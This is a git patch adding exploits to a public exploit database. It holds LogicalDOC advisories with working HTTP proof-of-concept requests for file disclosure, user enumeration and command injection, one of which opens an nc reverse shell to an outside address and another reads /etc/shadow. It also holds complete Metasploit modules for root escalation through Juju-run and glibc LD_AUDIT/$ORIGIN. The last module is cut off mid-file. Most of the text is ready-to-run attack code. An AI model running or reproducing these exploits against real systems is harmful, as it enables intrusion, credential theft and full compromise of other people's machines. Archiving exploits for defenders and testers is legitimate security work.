From 7b401481a204275384eea1e32e1ebaaf80ce0c6d Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 13 Feb 2018 05:01:51 +0000 Subject: [PATCH] DB: 2018-02-13 7 changes to exploits/shellcodes Juju-run Agent - Privilege Escalation (Metasploit) glibc - '$ORIGIN' Expansion Privilege Escalation (Metasploit) glibc - 'LD_AUDIT' Arbitrary DSO Load Privilege Escalation (Metasploit) LibreOffice < 6.0.1 - '=WEBSERVICE' Remote Arbitrary File Disclosure LogicalDOC Enterprise 7.7.4 - Directory Traversal LogicalDOC Enterprise 7.7.4 - User Enumeration LogicalDOC Enterprise 7.7.4 - Root Remote Code Execution --- exploits/java/webapps/44019.txt | 111 +++++++++ exploits/java/webapps/44020.txt | 86 +++++++ exploits/java/webapps/44021.txt | 103 +++++++++ exploits/linux/local/44023.rb | 132 +++++++++++ exploits/linux/local/44024.rb | 232 +++++++++++++++++++ exploits/linux/local/44025.rb | 249 ++++++++++++++++++++ exploits/linux/remote/44022.md | 396 ++++++++++++++++++++++++++++++++ files_exploits.csv | 7 + 8 files changed, 1316 insertions(+) create mode 100644 exploits/java/webapps/44019.txt create mode 100644 exploits/java/webapps/44020.txt create mode 100644 exploits/java/webapps/44021.txt create mode 100755 exploits/linux/local/44023.rb create mode 100755 exploits/linux/local/44024.rb create mode 100755 exploits/linux/local/44025.rb create mode 100644 exploits/linux/remote/44022.md diff --git a/exploits/java/webapps/44019.txt b/exploits/java/webapps/44019.txt new file mode 100644 index 000000000..829abfe7c --- /dev/null +++ b/exploits/java/webapps/44019.txt @@ -0,0 +1,111 @@ +LogicalDOC Enterprise 7.7.4 Multiple Directory Traversal Vulnerabilities + + +Vendor: LogicalDOC Srl +Product web page: https://www.logicaldoc.com +Affected version: 7.7.4 + 7.7.3 + 7.7.2 + 7.7.1 + 7.6.4 + 7.6.2 + 7.5.1 + 7.4.2 + 7.1.1 + +Summary: LogicalDOC is a free document management system that is designed +to handle and share documents within an organization. LogicalDOC is a content +repository, with Lucene indexing, Activiti workflow, and a set of automatic +import procedures. + +Desc: The application suffers from multiple post-auth file disclosure vulnerability +when input passed thru the 'suffix' and 'fileVersion' parameters is not properly +verified before being used to include files. This can be exploited to read arbitrary +files from local resources with directory traversal attacks. + +Tested on: Microsoft Windows 10 + Linux Ubuntu 16.04 + Java 1.8.0_161 + Apache-Coyote/1.1 + Apache Tomcat/8.5.24 + Apache Tomcat/8.5.13 + Undisclosed 8.41 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2018-5450 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5450.php + + +26.01.2018 + +--- + + +PoC #1: + +GET /thumbnail?docId=3375114&random=1517220341243&suffix=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1 +Host: localhost:8080 + + +Response: + +; for 16-bit app support +[fonts] +[extensions] +[mci extensions] +[files] +[Mail] +MAPI=1 +[MCI Extensions.BAK] +3g2=MPEGVideo +3gp=MPEGVideo +3gp2=MPEGVideo +3gpp=MPEGVideo +aac=MPEGVideo +adt=MPEGVideo +adts=MPEGVideo +m2t=MPEGVideo +m2ts=MPEGVideo +m2v=MPEGVideo +m4a=MPEGVideo +m4v=MPEGVideo +mod=MPEGVideo +mov=MPEGVideo +mp4=MPEGVideo +mp4v=MPEGVideo +mts=MPEGVideo +ts=MPEGVideo +tts=MPEGVideo + + + +PoC #2: + +GET /convertpdf?docId=2450&control=preview&fileVersion=../../../../../../etc/passwd HTTP/1.1 +Host: localhozt:8080 + + +Response: + +HTTP/1.1 200 +Cache-Control: must-revalidate, post-check=0,pre-check=0 +Expires: 0 +Content-Disposition: attachment; filename="=?UTF-8?B?MDkyMDEyMzEwNTVTUFQgMDA0LnBkZi5wZGY=?=" +Pragma: public +Content-Type: application/pdf;charset=UTF-8 +Content-Length: 964 +Date: Mon, 05 Feb 2018 21:30:59 GMT +Connection: close + +root:x:0:0:root:/root:/bin/bash +daemon:x:1:1:daemon:/usr/sbin:/bin/sh +bin:x:2:2:bin:/bin:/bin/sh +sys:x:3:3:sys:/dev:/bin/sh +sync:x:4:100:sync:/bin:/bin/sync +games:x:5:100:games:/usr/games:/bin/sh +... +... \ No newline at end of file diff --git a/exploits/java/webapps/44020.txt b/exploits/java/webapps/44020.txt new file mode 100644 index 000000000..d0e718911 --- /dev/null +++ b/exploits/java/webapps/44020.txt @@ -0,0 +1,86 @@ +LogicalDOC Enterprise 7.7.4 Username Enumeration Weakness + + +Vendor: LogicalDOC Srl +Product web page: https://www.logicaldoc.com +Affected version: 7.7.4 + 7.7.3 + 7.7.2 + 7.7.1 + 7.6.4 + 7.6.2 + 7.5.1 + 7.4.2 + 7.1.1 + +Summary: LogicalDOC is a free document management system that is designed +to handle and share documents within an organization. LogicalDOC is a content +repository, with Lucene indexing, Activiti workflow, and a set of automatic +import procedures. + +Desc: The weakness is caused due to the 'j_spring_security_check' script +and how it verifies provided credentials. Attacker can use this weakness +to enumerate valid users on the affected node. + +Tested on: Microsoft Windows 10 + Linux Ubuntu 16.04 + Java 1.8.0_161 + Apache-Coyote/1.1 + Apache Tomcat/8.5.24 + Apache Tomcat/8.5.13 + Undisclosed 8.41 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2018-5451 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5451.php + + +26.01.2018 + +-- + + +Request/response for existent username: +--------------------------------------- + +POST /j_spring_security_check HTTP/1.1 +Host: 192.168.1.74:8080 + +j_username=admin&j_password=123123&j_successurl=%2Ffrontend.jsp&j_failureurl=%2Flogin.jsp + +-- + +HTTP/1.1 302 +Set-Cookie: ldoc-failure=wrongpassword +Location: //login.jsp?failure=wrongpassword +Content-Length: 0 +Date: Tue, 06 Feb 2084 19:42:15 GMT +Connection: close + + +Request/response for non-existent username: +------------------------------------------- + +POST /j_spring_security_check HTTP/1.1 +Host: 192.168.1.74:8080 + +j_username=n00b&j_password=123123&j_successurl=%2Ffrontend.jsp&j_failureurl=%2Flogin.jsp + +-- + +HTTP/1.1 500 +Set-Cookie: JSESSIONID=F06F1D03E249D90802AFE92428DBBEDD; Path=/; Secure; HttpOnly +Content-Type: text/html;charset=UTF-8 +Content-Length: 78 +Date: Tue, 06 Feb 2084 19:57:14 GMT +Connection: close + + + +


ERROR
+ + \ No newline at end of file diff --git a/exploits/java/webapps/44021.txt b/exploits/java/webapps/44021.txt new file mode 100644 index 000000000..48cc2cb04 --- /dev/null +++ b/exploits/java/webapps/44021.txt @@ -0,0 +1,103 @@ +LogicalDOC Enterprise 7.7.4 Post-Auth Command Execution Via Binary Path Manipulation + + +Vendor: LogicalDOC Srl +Product web page: https://www.logicaldoc.com +Affected version: 7.7.4 + 7.7.3 + 7.7.2 + 7.7.1 + 7.6.4 + 7.6.2 + 7.5.1 + 7.4.2 + 7.1.1 + +Summary: LogicalDOC is a free document management system that is designed +to handle and share documents within an organization. LogicalDOC is a content +repository, with Lucene indexing, Activiti workflow, and a set of automatic +import procedures. + +Desc: LogicalDOC suffers from multiple authenticated OS command execution +vulnerabilities by manipulating the path of the many binaries included in the +package when changing the settings with their respected arguments. This can be +exploited to execute local root privilege escalation attack and/or inject and +execute arbitrary system commands as the root or SYSTEM user depending on the +platform affected. + +Tested on: Microsoft Windows 10 + Linux Ubuntu 16.04 + Java 1.8.0_161 + Apache-Coyote/1.1 + Apache Tomcat/8.5.24 + Apache Tomcat/8.5.13 + Undisclosed 8.41 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2018-5452 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5452.php + + +26.01.2018 + + + + +After saving the settings, the command will be executed whenever a user uploads a file +that was inserted in the 'default.antivirus.includes' list. PoC for antivirus.command: +-------------------------------------------------------------------------------------- + +POST /frontend/setting HTTP/1.1 +Host: localhost:8080 +Connection: keep-alive +Content-Length: 594 +X-GWT-Module-Base: http://localhost:8080/frontend/ +X-GWT-Permutation: 87C7268A2BDB185A47D161B6D6D2DEE8 +Origin: http://localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 OPR/50.0.2762.67 +Content-Type: text/x-gwt-rpc; charset=UTF-8 +Accept: */* +Referer: http://localhost:8080/frontend.jsp?docId=3735554 +Accept-Encoding: gzip, deflate, br +Accept-Language: en-US,en;q=0.9 +Cookie: GLog=%7B%0A%20%20%20%20trackRPC%3Afalse%0A%7D; JSESSIONID=FCFD7719139A634C8411FD081780BE2A; ldoc-sid=5dd1ea28-36a0-4967-bdd8-2556d16101d7 + + +7|0|16|http://localhost:8080/frontend/|2B4A04609097A6274DA6D61C469E4E6B|com.logicaldoc.gui.frontend.client.services.SettingService|saveSettings|[Lcom.logicaldoc.gui.common.client.beans.GUIParameter;/1603922774|com.logicaldoc.gui.common.client.beans.GUIParameter/3041767606|default.antivirus.enabled|true|default.antivirus.excludes|*.tif,*.tiff,*.jpg,*.jpeg,*.png,*.bmp,*.gif,*.txt,*.iso|default.antivirus.includes|*.exe,*.com,*.pif,*.scr,*.dll,*.tar.gz|default.antivirus.timeout|0|antivirus.command|c:\\windows\\system32\\calc.exe|1|2|3|4|1|5|5|5|6|0|7|8|6|0|9|10|6|0|11|12|6|0|13|14|6|0|15|16| + + + +PoC for call home reverse shell via ocr.Tesseract.path: +------------------------------------------------------- + +POST /frontend/setting HTTP/1.1 +Host: localhost:8080 + + +7|0|25|https://localhost:8080/frontend/|2B4A04609097A6274DA6D61C469E4E6B|com.logicaldoc.gui.frontend.client.services.SettingService|saveSettings|[Lcom.logicaldoc.gui.common.client.beans.GUIParameter;/1603922774|com.logicaldoc.gui.common.client.beans.GUIParameter/3041767606|default.ocr.includes|*.pdf,*.tif,*.png,*.jpg,*.txt|default.ocr.excludes|*.odt|default.ocr.text.threshold|1|default.ocr.resolution.threshold|400|ocr.timeout|90|ocr.rendres|180|ocr.rendres.barcode|ocr.batch|2|ocr.engine|Tesseract|ocr.Tesseract.path|nc -c /bin/sh 10.0.0.17 4444|1|2|3|4|1|5|5|10|6|0|7|8|6|0|9|10|6|0|11|12|6|0|13|14|6|0|15|16|6|0|17|18|6|0|19|18|6|0|20|21|6|0|22|23|6|0|24|25| + + + +PoC for Key Store via OpenSSL path: +----------------------------------- + +POST /frontend/sign HTTP/1.1 +Host: localhost:8080 + + +7|0|14|https://localhost:8080/frontend/|16A5065211C47142C5282B2BC4600F1D|com.logicaldoc.gui.frontend.client.services.SignService|generateNewKeystore|com.logicaldoc.gui.common.client.beans.GUIKeystore/3815185030|java.util.Date/3385151746|1337|/usr/bin/openssl && /usr/bin/cat /etc/shadow|root|O=ZSL,OU=JXY,C=MK|123|#000000|$PAGE_WIDTH/6|5|1|2|3|4|1|5|5|6|WFn2zQZ|A|7|8|9|10|0|11|12|60|100|0|13|14|14|B|2| + + + +PoC for clients and external apps and services path via command.convert, command.gs, command.openssl, command.pdftohtml, command.keytool: +----------------------------------------------------------------------------------------------------------------------------------------- + +POST /frontend/setting HTTP/1.1 +Host: localhost:8080 + + +7|0|35|https://localhost:8080/frontend/|2B4A04609097A6274DA6D61C469E4E6B|com.logicaldoc.gui.frontend.client.services.SettingService|saveSettings|[Lcom.logicaldoc.gui.common.client.beans.GUIParameter;/1603922774|com.logicaldoc.gui.common.client.beans.GUIParameter/3041767606|webservice.enabled|true|webdav.enabled|webdav.usecache|false|command.convert|/usr/bin/whoami > test.txt|command.gs|/usr/bin/gs|command.openssl|/usr/bin/openssl|command.pdftohtml|/usr/bin/pdftohtml|command.keytool|1337|cmis.enabled|cmis.changelog|cmis.maxitems|200|default.extcall.enabled|default.extcall.name|External Call|default.extcall.baseurl||default.extcall.suffix|default.extcall.window|_blank|default.extcall.params|user|1|2|3|4|1|5|5|17|6|0|7|8|6|0|9|8|6|0|10|11|6|0|12|13|6|0|14|15|6|0|16|17|6|0|18|19|6|0|20|21|6|0|22|8|6|0|23|8|6|0|24|25|6|0|26|11|6|0|27|28|6|0|29|30|6|0|31|30|6|0|32|33|6|0|34|35| \ No newline at end of file diff --git a/exploits/linux/local/44023.rb b/exploits/linux/local/44023.rb new file mode 100755 index 000000000..ecb7cd0bb --- /dev/null +++ b/exploits/linux/local/44023.rb @@ -0,0 +1,132 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Post::File + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Juju-run Agent Privilege Escalation', + 'Description' => %q{ + This module attempts to gain root privileges on Juju agent systems + running the juju-run agent utility. + + Juju agent systems running agent tools prior to version 1.25.12, + 2.0.x before 2.0.4, and 2.1.x before 2.1.3, provide a UNIX domain socket + to manage software ("units") without setting appropriate permissions, + allowing unprivileged local users to execute arbitrary commands as root. + + This module has been tested successfully with Juju agent tools versions + 1.18.4, 1.25.5 and 1.25.9 on Ubuntu 14.04.1 LTS x86 deployed by Juju + 1.18.1-trusty-amd64 and 1.25.6-trusty-amd64 on Ubuntu 14.04.1 LTS x86_64. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Ryan Beisner', # Discovery and PoC + 'David Ames (@thedac)', # Discovery and PoC + 'Brendan Coles ' # Metasploit + ], + 'DisclosureDate' => 'Apr 13 2017', + 'Platform' => [ 'linux' ], + 'Arch' => [ ARCH_X86, ARCH_X64 ], + 'SessionTypes' => [ 'shell', 'meterpreter' ], + 'Targets' => [[ 'Auto', {} ]], + 'References' => + [ + [ 'CVE', '2017-9232' ], + [ 'BID', '98737' ], + [ 'URL', 'https://bugs.launchpad.net/juju/+bug/1682411' ] + ] + )) + register_options( + [ + OptString.new('UNIT', [ false, 'A valid Juju unit name', '' ]), + OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]) + ]) + end + + def check + juju_run_path = cmd_exec 'which juju-run' + + if juju_run_path.start_with? '/' + vprint_good 'juju-run is installed' + return CheckCode::Detected + end + + vprint_error 'juju-run is NOT installed' + + CheckCode::Safe + end + + def unit_names + units = [] + + cmd_exec('/bin/ls -m /var/log/juju/*.log').chomp.split(/,\s*/).each do |log| + units << ::File.basename(log).gsub(/\.log$/, '') + end + + cmd_exec('/bin/ls -m /var/lib/juju/agents/').chomp.split(/,\s*/).each do |agent| + units << ::File.basename(agent) + end + + units.uniq + end + + def execute_command(cmd, opts = {}) + cmd_exec "juju-run #{opts['unit']} '#{cmd}'" + end + + def upload_and_chmodx(path, data) + print_status "Writing '#{path}' (#{data.size} bytes) ..." + rm_f path + write_file path, data + cmd_exec "chmod +x '#{path}'" + register_file_for_cleanup path + end + + def exploit + if check != CheckCode::Detected + fail_with Failure::NotVulnerable, 'Target is not vulnerable' + end + + units = datastore['UNIT'].blank? ? unit_names : [ datastore['UNIT'] ] + + if units.empty? + fail_with Failure::Unknown, "Could not find any Juju units. Try specifying a 'UNIT'" + end + + # Check each unit for a privileged socket + print_status "Trying #{units.size} units..." + + socket_unit = nil + unit_names.each do |unit| + id = execute_command 'id', 'unit' => unit + + if id.include? 'root' + print_good "Unit #{unit.inspect} uses a privileged socket" + socket_unit = unit + break + end + end + + if socket_unit.nil? + fail_with Failure::NotVulnerable, 'Could not find any Juju units using a privileged socket' + end + + # Upload payload executable + payload_name = ".#{rand_text_alphanumeric rand(5..10)}" + payload_path = "#{datastore['WritableDir']}/#{payload_name}" + upload_and_chmodx payload_path, generate_payload_exe + + # Execute payload executable + vprint_status 'Executing payload...' + execute_command payload_path, 'unit' => socket_unit + end +end \ No newline at end of file diff --git a/exploits/linux/local/44024.rb b/exploits/linux/local/44024.rb new file mode 100755 index 000000000..84e430ad2 --- /dev/null +++ b/exploits/linux/local/44024.rb @@ -0,0 +1,232 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/exploit/local/linux' +require 'msf/core/exploit/exe' + +class MetasploitModule < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Post::File + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + include Msf::Exploit::Local::Linux + + def initialize(info = {}) + super(update_info(info, + 'Name' => "glibc '$ORIGIN' Expansion Privilege Escalation", + 'Description' => %q{ + This module attempts to gain root privileges on Linux systems by abusing + a vulnerability in the GNU C Library (glibc) dynamic linker. + + glibc ld.so in versions before 2.11.3, and 2.12.x before 2.12.2 does not + properly restrict use of the LD_AUDIT environment variable when loading + setuid executables which allows control over the $ORIGIN library search + path resulting in execution of arbitrary shared objects. + + This module opens a file descriptor to the specified suid executable via + a hard link, then replaces the hard link with a shared object before + instructing the linker to execute the file descriptor, resulting in + arbitrary code execution. + + The specified setuid binary must be readable and located on the same + file system partition as the specified writable directory. + + This module has been tested successfully on glibc version 2.5 on CentOS + 5.4 (x86_64), 2.5 on CentOS 5.5 (x86_64) and 2.12 on Fedora 13 (i386). + + RHEL 5 is reportedly affected, but untested. Some versions of ld.so, + such as the version shipped with Ubuntu 14, hit a failed assertion + in dl_open_worker causing exploitation to fail. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Tavis Ormandy', # Discovery and exploit + 'Brendan Coles' # Metasploit + ], + 'DisclosureDate' => 'Oct 18 2010', + 'Platform' => 'linux', + 'Arch' => [ ARCH_X86, ARCH_X64 ], + 'SessionTypes' => [ 'shell', 'meterpreter' ], + 'Targets' => + [ + [ 'Automatic', { } ], + [ 'Linux x86', { 'Arch' => ARCH_X86 } ], + [ 'Linux x64', { 'Arch' => ARCH_X64 } ] + ], + 'DefaultTarget' => 0, + 'References' => + [ + [ 'CVE', '2010-3847' ], + [ 'BID', '44154' ], + [ 'EDB', '15274' ], + [ 'URL', 'http://seclists.org/fulldisclosure/2010/Oct/257' ], + [ 'URL', 'https://www.ubuntu.com/usn/usn-1009-1' ], + [ 'URL', 'https://security-tracker.debian.org/tracker/CVE-2010-3847' ], + [ 'URL', 'https://access.redhat.com/security/cve/CVE-2010-3847' ] + ] + )) + register_options( + [ + OptString.new('SUID_EXECUTABLE', [ true, 'Path to a suid executable', '/bin/ping' ]), + OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]) + ]) + end + + def base_dir + datastore['WritableDir'] + end + + def suid_exe_path + datastore['SUID_EXECUTABLE'] + end + + def check + glibc_banner = cmd_exec 'ldd --version' + glibc_version = Gem::Version.new glibc_banner.scan(/^ldd\s+\(.*\)\s+([\d\.]+)/).flatten.first + if glibc_version.eql? '' + vprint_error 'Could not determine the GNU C library version' + return CheckCode::Safe + elsif glibc_version >= Gem::Version.new('2.12.2') || + (glibc_version >= Gem::Version.new('2.11.3') && glibc_version < Gem::Version.new('2.12')) + vprint_error "GNU C Library version #{glibc_version} is not vulnerable" + return CheckCode::Safe + end + vprint_good "GNU C Library version #{glibc_version} is vulnerable" + + unless setuid? suid_exe_path + vprint_error "#{suid_exe_path} is not setuid" + return CheckCode::Detected + end + vprint_good "#{suid_exe_path} is setuid" + + unless cmd_exec("test -r #{suid_exe_path} && echo true").include? 'true' + vprint_error("#{suid_exe_path} is not readable") + return CheckCode::Detected + end + vprint_good "#{suid_exe_path} is readable" + + CheckCode::Appears + end + + def upload_and_chmodx(path, data) + print_status "Writing '#{path}' (#{data.size} bytes) ..." + rm_f path + write_file path, data + cmd_exec "chmod +x '#{path}'" + register_file_for_cleanup path + end + + def exploit + check_status = check + + if check_status == CheckCode::Appears + print_good 'The target appears to be vulnerable' + elsif check_status == CheckCode::Detected + fail_with Failure::BadConfig, "#{suid_exe_path} is not suid or not readable" + else + fail_with Failure::NotVulnerable, 'Target is not vulnerable' + end + + suid_partition = cmd_exec "df -P -- '#{suid_exe_path}' | awk 'NR==2 {print $1}'" + base_partition = cmd_exec "df -P -- '#{base_dir}' | awk 'NR==2 {print $1}'" + if suid_partition == base_partition + vprint_good "'#{suid_exe_path}' and '#{base_dir}' are located on the same partition" + else + print_warning "'#{suid_exe_path}' and '#{base_dir}' are not located on the same partition" + end + + payload_name = ".#{rand_text_alphanumeric rand(5..10)}" + payload_path = "#{base_dir}/#{payload_name}" + + # Set target + uname = cmd_exec 'uname -m' + vprint_status "System architecture is #{uname}" + if target.name.eql? 'Automatic' + case uname + when 'x86_64' + my_target = targets[2] + when /x86/, /i\d86/ + my_target = targets[1] + else + fail_with Failure::NoTarget, 'Unable to automatically select a target' + end + else + my_target = target + end + print_status "Using target: #{my_target.name}" + + cpu = nil + case my_target['Arch'] + when ARCH_X86 + cpu = Metasm::Ia32.new + when ARCH_X64 + cpu = Metasm::X86_64.new + else + fail_with Failure::NoTarget, 'Target is not compatible' + end + + # Compile shared object + so_stub = %| + extern int setuid(int); + extern int setgid(int); + extern int system(const char *__s); + + void init(void) __attribute__((constructor)); + + void __attribute__((constructor)) init() { + setuid(0); + setgid(0); + system("#{payload_path}"); + } + | + + begin + so = Metasm::ELF.compile_c(cpu, so_stub).encode_string(:lib) + rescue + print_error "Metasm encoding failed: #{$ERROR_INFO}" + elog "Metasm encoding failed: #{$ERROR_INFO.class} : #{$ERROR_INFO}" + elog "Call stack:\n#{$ERROR_INFO.backtrace.join "\n"}" + fail_with Failure::Unknown, 'Metasm encoding failed' + end + + # Upload shared object + so_name = ".#{rand_text_alphanumeric rand(5..10)}" + so_path = "#{base_dir}/#{so_name}" + upload_and_chmodx so_path, so + + # Upload exploit + link_name = ".#{rand_text_alphanumeric rand(5..10)}" + link_path = "#{base_dir}/#{link_name}" + fd = rand(10..200) + exp = %( + rm -rf '#{link_path}' + mkdir '#{link_path}' + ln #{suid_exe_path} #{link_path}/#{link_name} + exec #{fd}< #{link_path}/#{link_name} + ls -l /proc/$$/fd/#{fd} + rm -rf '#{link_path}' + ls -l /proc/$$/fd/#{fd} + mv #{so_path} #{link_path} + LD_AUDIT="\\$ORIGIN" exec /proc/self/fd/#{fd} + ) + + exp_name = ".#{rand_text_alphanumeric rand(5..10)}" + exp_path = "#{base_dir}/#{exp_name}" + upload_and_chmodx exp_path, exp + register_file_for_cleanup link_path + + # Upload payload + upload_and_chmodx payload_path, generate_payload_exe + + # Launch exploit + print_status 'Launching exploit...' + # The echo at the end of the command is required + # else the original session may die + output = cmd_exec "#{exp_path}& echo " + output.each_line { |line| vprint_status line.chomp } + end +end \ No newline at end of file diff --git a/exploits/linux/local/44025.rb b/exploits/linux/local/44025.rb new file mode 100755 index 000000000..79ecef50a --- /dev/null +++ b/exploits/linux/local/44025.rb @@ -0,0 +1,249 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/exploit/local/linux' +require 'msf/core/exploit/exe' + +class MetasploitModule < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Post::File + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + include Msf::Exploit::Local::Linux + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'glibc LD_AUDIT Arbitrary DSO Load Privilege Escalation', + 'Description' => %q{ + This module attempts to gain root privileges on Linux systems by abusing + a vulnerability in the GNU C Library (glibc) dynamic linker. + + glibc ld.so in versions before 2.11.3, and 2.12.x before 2.12.2 does not + properly restrict use of the LD_AUDIT environment variable when loading + setuid executables. This allows loading arbitrary shared objects from + the trusted library search path with the privileges of the suid user. + + This module uses LD_AUDIT to load the libpcprofile.so shared object, + distributed with some versions of glibc, and leverages arbitrary file + creation functionality in the library constructor to write a root-owned + world-writable file to a system trusted search path (usually /lib). + The file is then overwritten with a shared object then loaded with + LD_AUDIT resulting in arbitrary code execution. + + This module has been tested successfully on glibc version 2.11.1 on + Ubuntu 10.04 x86_64 and version 2.7 on Debian 5.0.4 i386. + + RHEL 5 is reportedly affected, but untested. Some glibc distributions + do not contain the libpcprofile.so library required for successful + exploitation. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Tavis Ormandy', # Discovery and exploit + 'zx2c4', # "I Can't Read and I Won't Race You Either" exploit + 'Marco Ivaldi', # raptor_ldaudit and raptor_ldaudit2 exploits + 'Todor Donev', # libmemusage.so exploit + 'Brendan Coles' # Metasploit + ], + 'DisclosureDate' => 'Oct 18 2010', + 'Platform' => 'linux', + 'Arch' => [ ARCH_X86, ARCH_X64 ], + 'SessionTypes' => [ 'shell', 'meterpreter' ], + 'Targets' => + [ + [ 'Automatic', { } ], + [ 'Linux x86', { 'Arch' => ARCH_X86 } ], + [ 'Linux x64', { 'Arch' => ARCH_X64 } ] + ], + 'DefaultTarget' => 0, + 'References' => + [ + [ 'CVE', '2010-3847' ], + [ 'CVE', '2010-3856' ], + [ 'BID', '44154' ], + [ 'BID', '44347' ], + [ 'EDB', '15274' ], + [ 'EDB', '15304' ], + [ 'EDB', '18105' ], + [ 'URL', 'http://seclists.org/fulldisclosure/2010/Oct/257' ], + [ 'URL', 'http://seclists.org/fulldisclosure/2010/Oct/344' ], + [ 'URL', 'https://www.ubuntu.com/usn/usn-1009-1' ], + [ 'URL', 'https://security-tracker.debian.org/tracker/CVE-2010-3847' ], + [ 'URL', 'https://security-tracker.debian.org/tracker/CVE-2010-3856' ], + [ 'URL', 'https://access.redhat.com/security/cve/CVE-2010-3847' ], + [ 'URL', 'https://access.redhat.com/security/cve/CVE-2010-3856' ] + ] + )) + register_options( + [ + OptString.new('SUID_EXECUTABLE', [ true, 'Path to a SUID executable', '/bin/ping' ]), + OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]) + ]) + end + + def base_dir + datastore['WritableDir'] + end + + def suid_exe_path + datastore['SUID_EXECUTABLE'] + end + + def check + glibc_banner = cmd_exec 'ldd --version' + glibc_version = Gem::Version.new glibc_banner.scan(/^ldd\s+\(.*\)\s+([\d\.]+)/).flatten.first + if glibc_version.to_s.eql? '' + vprint_error 'Could not determine the GNU C library version' + return CheckCode::Safe + elsif glibc_version >= Gem::Version.new('2.12.2') || + (glibc_version >= Gem::Version.new('2.11.3') && glibc_version < Gem::Version.new('2.12')) + vprint_error "GNU C Library version #{glibc_version} is not vulnerable" + return CheckCode::Safe + end + vprint_good "GNU C Library version #{glibc_version} is vulnerable" + + lib = 'libpcprofile.so' + @lib_dir = nil + vprint_status "Checking for #{lib} in system search paths" + search_paths = cmd_exec "env -i LD_PRELOAD=#{rand_text_alpha rand(10..15)} LD_DEBUG=libs env 2>&1 | grep 'search path='" + search_paths.split('path=')[1..-1].join.split(':').each do |path| + lib_dir = path.to_s.strip + next if lib_dir.eql? '' + libs = cmd_exec "ls '#{lib_dir}'" + if libs.include? lib + @lib_dir = lib_dir + break + end + end + if @lib_dir.nil? + vprint_error "Could not find #{lib}" + return CheckCode::Safe + end + vprint_good "Found #{lib} in #{@lib_dir}" + + unless setuid? suid_exe_path + vprint_error "#{suid_exe_path} is not setuid" + return CheckCode::Detected + end + vprint_good "#{suid_exe_path} is setuid" + + CheckCode::Appears + end + + def upload_and_chmodx(path, data) + print_status "Writing '#{path}' (#{data.size} bytes) ..." + rm_f path + write_file path, data + cmd_exec "chmod +x '#{path}'" + register_file_for_cleanup path + end + + def on_new_session(client) + # remove root owned shared object from system load path + if client.type.eql? 'meterpreter' + client.core.use 'stdapi' unless client.ext.aliases.include? 'stdapi' + client.fs.file.rm @so_path + else + client.shell_command_token "rm #{@so_path}" + end + end + + def exploit + check_status = check + + if check_status == CheckCode::Appears + print_good 'The target appears to be vulnerable' + elsif check_status == CheckCode::Detected + fail_with Failure::BadConfig, "#{suid_exe_path} is not suid" + else + fail_with Failure::NotVulnerable, 'Target is not vulnerable' + end + + payload_name = ".#{rand_text_alphanumeric rand(5..10)}" + payload_path = "#{base_dir}/#{payload_name}" + + # Set target + uname = cmd_exec 'uname -m' + vprint_status "System architecture is #{uname}" + if target.name.eql? 'Automatic' + case uname + when 'x86_64' + my_target = targets[2] + when /x86/, /i\d86/ + my_target = targets[1] + else + fail_with Failure::NoTarget, 'Unable to automatically select a target' + end + else + my_target = target + end + print_status "Using target: #{my_target.name}" + + cpu = nil + case my_target['Arch'] + when ARCH_X86 + cpu = Metasm::Ia32.new + when ARCH_X64 + cpu = Metasm::X86_64.new + else + fail_with Failure::NoTarget, 'Target is not compatible' + end + + # Compile shared object + so_stub = %| + extern int setuid(int); + extern int setgid(int); + extern int system(const char *__s); + + void init(void) __attribute__((constructor)); + + void __attribute__((constructor)) init() { + setuid(0); + setgid(0); + system("#{payload_path}"); + } + | + + begin + so = Metasm::ELF.compile_c(cpu, so_stub).encode_string(:lib) + rescue + print_error "Metasm encoding failed: #{$ERROR_INFO}" + elog "Metasm encoding failed: #{$ERROR_INFO.class} : #{$ERROR_INFO}" + elog "Call stack:\n#{$ERROR_INFO.backtrace.join "\n"}" + fail_with Failure::Unknown, 'Metasm encoding failed' + end + + # Upload shared object + so_name = ".#{rand_text_alphanumeric rand(5..10)}" + so_path = "#{base_dir}/#{so_name}" + upload_and_chmodx so_path, so + + # Upload exploit + @so_path = "#{@lib_dir}/#{so_name}.so" + exp = %( + umask 0 + LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="#{@so_path}" #{suid_exe_path} 2>/dev/null + umask 0022 + cat #{so_path} > #{@so_path} + LD_AUDIT="#{so_name}.so" #{suid_exe_path} + echo > #{@so_path} + ) + exp_name = ".#{rand_text_alphanumeric rand(5..10)}" + exp_path = "#{base_dir}/#{exp_name}" + upload_and_chmodx exp_path, exp + + # 